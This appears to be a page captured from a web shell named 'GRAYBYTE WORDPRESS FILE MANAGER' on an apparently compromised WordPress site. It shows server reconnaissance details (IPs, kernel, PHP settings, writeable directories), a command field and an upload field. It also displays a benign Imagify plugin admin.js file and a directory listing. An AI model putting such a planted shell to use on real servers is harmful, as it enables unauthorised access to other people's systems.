GRAYBYTE WORDPRESS FILE MANAGER6335

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/imagify/assets/js/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/imagify/assets/js//admin.js
window.imagify = window.imagify || {};

jQuery.extend( window.imagify, {
	concat: ajaxurl.indexOf( '?' ) > 0 ? '&' : '?',
	log:    function( content ) {
		if ( undefined !== console ) {
			console.log( content ); // eslint-disable-line no-console
		}
	},
	info:   function( content ) {
		if ( undefined !== console ) {
			console.info( content ); // eslint-disable-line no-console
		}
	},
	openModal: function( $link ) {
		var target = $link.data( 'target' ) || $link.attr( 'href' );

		jQuery( target ).css( 'display', 'flex' ).hide().fadeIn( 400 ).attr( {
			'aria-hidden': 'false',
			'tabindex':    '0'
		} ).trigger('focus').removeAttr( 'tabindex' ).addClass( 'modal-is-open' );

		jQuery( 'body' ).addClass( 'imagify-modal-is-open' );
	},
	template: function( id ) {
		if ( undefined === _ ) {
			// No need to load underscore everywhere if we don't use it.
			return '';
		}

		return _.memoize( function( data ) {
			var compiled,
				options = {
					evaluate:    /<#([\s\S]+?)#>/g,
					interpolate: /\{\{\{([\s\S]+?)\}\}\}/g,
					escape:      /\{\{([^}]+?)\}\}(?!\})/g,
					variable:    'data'
				};

			return function() {
				compiled = compiled || _.template( jQuery( '#tmpl-' + id ).html(), null, options );
				data     = data || {};
				return compiled( data );
			};
		} );
	},
	humanSize: function( bytes ) {
		var sizes = ['B', 'kB', 'MB'],
			i;

		if ( 0 === bytes ) {
			return '0\xA0kB';
		}

		i = parseInt( Math.floor( Math.log( bytes ) / Math.log( 1024 ) ), 10 );

		return ( bytes / Math.pow( 1024, i ) ).toFixed( 2 ) + '\xA0' + sizes[ i ];
	}
} );


// Imagify light modal =============================================================================
(function($, d, w, undefined) { // eslint-disable-line no-unused-vars, no-shadow, no-shadow-restricted-names

	// Accessibility.
	$( '.imagify-modal' ).attr( 'aria-hidden', 'true' );

	$( d )
		// On click on modal trigger, open modal.
		.on( 'click.imagify', '.imagify-modal-trigger', function( e ) {
			e.preventDefault();
			w.imagify.openModal( $( this ) );
		} )
		// On click on close button, close modal.
		.on( 'click.imagify', '.imagify-modal .close-btn', function() {
			var $modal = $( this ).closest( '.imagify-modal' );

			$modal.fadeOut( 400 ).attr( 'aria-hidden', 'true' ).removeClass( 'modal-is-open' ).trigger( 'modalClosed.imagify' );

			$( 'body' ).removeClass( 'imagify-modal-is-open' );
		} )
		// On close button blur, improve accessibility.
		.on( 'blur.imagify', '.imagify-modal .close-btn', function() {
			var $modal = $( this ).closest( '.imagify-modal' );

			if ( $modal.attr( 'aria-hidden' ) === 'false' ) {
				$modal.attr( 'tabindex', '0' ).trigger('focus').removeAttr( 'tabindex' );
			}
		} )
		// On click on dropped layer of modal, close modal.
		.on( 'click.imagify', '.imagify-modal', function( e ) {
			$( e.target ).filter( '.modal-is-open' ).find( '.close-btn' ).trigger( 'click.imagify' );
		} )
		// `Esc` key binding, close modal.
		.on( 'keydown.imagify', function( e ) {
			if ( 27 === e.keyCode && $( '.imagify-modal.modal-is-open' ).length > 0 ) {
				e.preventDefault();
				// Trigger the event.
				$( '.imagify-modal.modal-is-open' ).find( '.close-btn' ).trigger( 'click.imagify' );
			}
		} );

} )(jQuery, document, window);

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:30
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:30
giriqfky / giriqfky
0644
admin-bar.js
1.292 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
admin-bar.min.js
0.604 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
admin.js
3.188 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
admin.min.js
1.828 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
beat.js
22.633 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
beat.min.js
5.88 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
es6-promise.auto.js
27.814 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
es6-promise.auto.min.js
6.204 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
files-list.js
13.099 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
files-list.min.js
5.624 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
imagify-gulp.js
10.08 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
imagify-gulp.min.js
9.947 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
jquery.event.move.js
13.598 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
jquery.event.move.min.js
4.928 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
jquery.twentytwenty.js
26.297 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
jquery.twentytwenty.min.js
14.572 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
library.js
1.761 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
library.min.js
1.104 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
media-modal.js
9.56 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
media-modal.min.js
3.967 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notices.js
4.037 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notices.min.js
2.175 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
options.js
28.806 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
options.min.js
14.79 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
pricing-modal.js
19.334 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
pricing-modal.min.js
9.052 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
sweetalert2.js
49.155 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
sweetalert2.min.js
22.107 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF